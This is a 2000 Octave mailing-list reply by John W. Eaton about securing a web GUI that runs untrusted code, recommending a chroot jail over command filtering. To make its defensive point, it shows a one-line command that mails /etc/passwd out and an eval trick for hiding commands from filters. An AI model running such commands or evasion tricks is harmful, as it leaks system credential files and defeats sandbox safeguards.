Re: Octave Web GUI

[John W. Eaton]

On 26-Jun-2000, Jonathan King <address@hidden> wrote:

| Sounds interesting, but the point about security is, I think, extremely
| important.  I'm sure that somebody will correct me if I'm wrong, but
| Octave wasn't really developed for this purpose, so there are probably
| many potential "gotchas" beyond the obvious ones.

Right.

Running untrusted code in chroot jail is a good idea.  If it is set up
correctly, it should prevent someone from doing something like

  system ("Mail address@hidden /etc/passwd");

to get a copy of your real password file.

Trying to filter out commands in the source code is probably not the
right approach because it won't prevent things like

  somestring = "a command you really don't want to execute";
  ...
  eval (somestring);

(Imagine all the ways to can hide the contents of `somestring' using
numeric codes, setstr, or whatever.

The `simple' solution of not allowing eval() will also prevent lots of
valid Octave code from working.

For some ideas about another way to implement a secure version of
Octave without having to modify the Octave sources, you might also
look at NetMath, http://rene.ma.utexas.edu/users/wfs/netmath/demo/demo.html.
It solves the security problem by preloading a library that replaces
system calls like open, unlink, rmdir, etc. with safe versions.
Unfortunately, the trick that it uses may not work on all (or even
very many) Unix systems, including more recent Linux distributions.

jwe



-----------------------------------------------------------------------
Octave is freely available under the terms of the GNU GPL.

Octave's home on the web:  http://www.che.wisc.edu/octave/octave.html
How to fund new projects:  http://www.che.wisc.edu/octave/funding.html
Subscription information:  http://www.che.wisc.edu/octave/archive.html
-----------------------------------------------------------------------